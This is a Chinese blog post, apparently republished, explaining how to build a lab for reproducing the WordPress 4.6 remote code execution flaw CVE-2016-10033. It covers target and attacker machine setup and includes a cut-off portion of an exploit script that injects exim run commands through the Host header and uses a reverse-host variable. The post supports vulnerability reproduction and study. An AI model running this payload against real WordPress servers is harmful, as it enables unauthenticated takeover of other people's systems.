2. 程式人生 > 其它 >WordPress 4.6遠端程式碼執行漏洞(CVE-2016-10033)復現環境搭建指南

WordPress 4.6遠端程式碼執行漏洞(CVE-2016-10033)復現環境搭建指南

阿新 發佈:2022-04-28

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞(非外掛無需認證,附Poc,演示視訊)——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

搭建環境的步驟:

1.靶機

靶機不能是虛擬機器 因為虛擬機器修改了HOST頭會無法訪問

靶機我是在一臺電腦上裝了ubuntu 16.04。

外加lamp環境 apache2 php7 mysql-server phpmyadmin。

具體的指令網上都有 這裡就不贅述 然後直到看到it works。

下載wordpress4.6的安裝壓縮包 https://wordpress.org/wordpress-4.6.zip

。解壓到/var/www/html/目錄下 瀏覽器訪問進行wordpress安裝直到結束!注意這裡會要求你輸入後臺管理員的郵箱,這個是和後面poc中的一部分掛鉤的,後面會提到

靶機安裝exim4而不是sendmail

sudo apt-get install exim4

上述命令用來安裝exim4

dpkg-reconfigure exim4-config

上述命令用來配置 第一個選項選第一個:internet site; mail is sent and received directly using SMTP 第二個選項輸入:你IP對應的DNS名稱(發郵件時顯示的@字尾) 這裡我直接寫的ip好像。後面的我基本都預設就行

靶機需要安裝curl

2.攻擊機

為了方便執行poc,攻擊機最好也是linux系統(裡面有一些curl nc等指令)

需要安裝python,因為會有python建立simple http server來讓靶機從你這邊獲取東西

攻擊機上執行 ./exp.sh [http://xx.xx.xx.xx/](http://xx.xx.xx.xx/) 即可 其中xx.xx.xx.xx為靶機wordpress的根地址

3.指令碼需要修改的部分

rev_host=”192.168.57.1″ #1 function prep_host_header() { cmd=”$1″ rce_cmd=”${run{$cmd}}”; # replace / with ${substr{0}{1}{$spool_directory}} #sed ‘s^/^${substr{0}{1}{$spool_directory}}^g’ rce_cmd=”`echo $rce_cmd | sed ‘s^/^${substr{0}{1}{$spool_directory}}^g’`” # replace ‘ ‘ (space) with #sed ‘s^ ^${substr{10}{1}{$tod_log}}$^g’ rce_cmd=”`echo $rce_cmd | sed ‘s^ ^${substr{10}{1}{$tod_log}}^g’`” #return “target(any -froot@localhost -be $rce_cmd null)” host_header=”target(any -froot@localhost -be $rce_cmd null)” return 0 } #cat exploitbox.ans intro=” DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6 b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1 QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54 eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4 bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K” intro2=” ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09 fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09 fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1 cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg==” echo “$intro” | base64 -d echo “$intro2″ | base64 -d if [ "$#" -ne 1 ]; then echo -e “Usage:n$0 target-wordpress-urln” exit 1 fi target=”$1″ echo -ne “e[91m[*]

相關推薦

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建

S2-032 遠端程式碼執行漏洞CVE-2016-3081

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-032

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

關於Spring Cloud Gateway 遠端程式碼執行漏洞CVE-2022-22947的安全告知

Spring Cloud Gateway 是 Spring Cloud 下的一個專案,該專案是基於 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技術開發的閘道器,它旨在為微服務架構提供一種簡單有效統一的 API 路由管理方式。

漏洞通告】Apache Struts2遠端程式碼執行漏洞CVE-2021-31805

轉至:https://www.venustech.com.cn/new_type/aqtg/20220413/23713.html 0x00 漏洞概述 CVE   ID CVE-2021-31805

開源應用框架Spring Framework存在遠端程式碼執行漏洞CVE-2022-22965解決方案

監測發現,開源應用框架Spring Framework存在遠端程式碼執行漏洞(CVE-2022-22965。經分析研判,在JDKJava開發工具包9及以上版本環境中,或版本低於5.3.18和5.2.20的Spring框架及衍生框架構建的網站或應用中,

Spring Framework遠端程式碼執行漏洞CVE-2022-22965

一、漏洞描述 springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

mongo-express 遠端程式碼執行漏洞CVE-2019-10758

mongo-express是一款mongodb的第三方Web介面,使用node和express開發。如果攻擊者可以成功登入,或者目標伺服器沒有修改預設的賬號密碼admin:pass,則可以執行任意node.js程式碼

S2-046 遠端程式碼執行漏洞CVE-2017-5638

影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-046

S2-057 遠端程式碼執行漏洞CVE-2018-11776

影響版本:<=Struts 2.3.34,Struts 2.5.16 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-057

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

gitlist 0.6.0 遠端命令執行漏洞CVE-2018-1000533

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞

GitLab 遠端命令執行漏洞CVE-2021-22205

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

node-postgres 程式碼執行漏洞CVE-2017-16082

漏洞原理 node-postgres在處理型別為Row Description的postgres返回包時,將欄位名拼接到程式碼中。由於沒有進行合理轉義,導致一個特殊構造的欄位名可逃逸出程式碼單引號限制,造成程式碼執行漏洞

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10204

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞CVE-2018-16621的繞過。

Webmin 遠端命令執行漏洞CVE-2019-15107

Webmin是一個用於管理類Unix系統的管理配置工具,具有Web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令。

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現 環境搭建 docker pull medicean/vulapps:s_shiro_1